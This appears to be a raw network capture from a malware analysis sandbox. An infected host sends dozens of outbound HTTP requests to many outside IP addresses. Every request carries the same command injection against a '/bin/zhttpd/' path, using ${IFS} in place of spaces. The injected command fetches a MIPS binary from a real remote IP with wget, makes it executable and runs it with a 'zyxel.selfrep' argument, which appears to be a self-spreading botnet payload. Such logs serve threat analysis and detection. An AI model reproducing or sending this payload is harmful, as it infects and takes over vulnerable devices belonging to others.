                                          Jan 14, 2024 15:46:00.699213028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          557192.168.2.2343318109.160.58.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699254990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          558192.168.2.2356420145.245.41.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699305058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          559192.168.2.2343566202.0.214.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699326992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          560192.168.2.2357532101.224.124.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699352026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          561192.168.2.2357220173.3.93.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699367046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          562192.168.2.2335212105.172.195.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699389935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          563192.168.2.233560446.228.111.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699441910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          564192.168.2.234364478.223.3.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699454069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          565192.168.2.234771279.36.8.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699481964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          566192.168.2.2343222133.122.83.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699506998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          567192.168.2.2343004190.73.124.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699526072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          568192.168.2.2357294159.202.112.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699528933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          569192.168.2.2342424195.87.178.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699584961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          570192.168.2.2358374136.28.221.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699615002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          571192.168.2.2350372221.253.36.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699616909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          572192.168.2.2335606153.14.46.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699629068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          573192.168.2.2338908110.33.197.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699673891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          574192.168.2.233428225.158.156.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699707985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          575192.168.2.233990053.125.150.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699731112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          576192.168.2.2352368161.44.208.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699774027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          577192.168.2.234090813.128.249.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699795008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          578192.168.2.2343416189.103.244.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699824095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          579192.168.2.2339992153.100.153.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699841022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          580192.168.2.2350422205.238.156.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699922085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          581192.168.2.2333422150.232.209.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699923038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          582192.168.2.2359634170.253.110.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699922085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          583192.168.2.2348062180.166.17.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699922085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          584192.168.2.2348800108.213.2.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699958086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          585192.168.2.2337222199.208.6.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700014114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          586192.168.2.2339202101.18.200.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700041056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          587192.168.2.2358652137.21.125.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700057983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          588192.168.2.234877882.51.23.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700064898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          589192.168.2.2337956138.170.92.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700083971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          590192.168.2.2349528204.242.2.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700084925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          591192.168.2.2340994157.116.70.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700148106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          592192.168.2.2340390120.35.13.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700166941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          593192.168.2.2356106217.103.194.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700196981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          594192.168.2.2349286113.40.58.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700196981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          595192.168.2.23410609.217.70.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700212955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          596192.168.2.2357752217.173.33.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700233936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          597192.168.2.2356760152.147.9.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700268984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          598192.168.2.2336990119.65.227.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700297117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          599192.168.2.2336554129.106.172.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700341940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          600192.168.2.2343558216.221.117.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700371027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          601192.168.2.2359790189.178.213.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700409889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          602192.168.2.2339388213.87.250.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700422049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          603192.168.2.233893081.14.112.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700483084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          604192.168.2.2349720176.160.216.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700506926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          605192.168.2.234110472.9.16.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700519085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          606192.168.2.2356018131.80.118.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700552940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          607192.168.2.2353554114.95.115.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700594902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          608192.168.2.2352776173.130.89.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700620890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          609192.168.2.233933817.12.49.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700629950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          610192.168.2.235688243.214.191.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700653076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          611192.168.2.235538679.205.229.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700654984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          612192.168.2.2343704201.158.216.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700699091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          613192.168.2.2350602208.192.176.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700716972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          614192.168.2.234256042.131.174.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700754881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          615192.168.2.2353886143.230.60.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700776100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          616192.168.2.235787860.146.22.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700799942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          617192.168.2.2338186115.86.106.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700845957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          618192.168.2.2360684131.11.221.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700877905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          619192.168.2.23337029.55.91.187443
                                          TimestampBytes transferredDirectionData
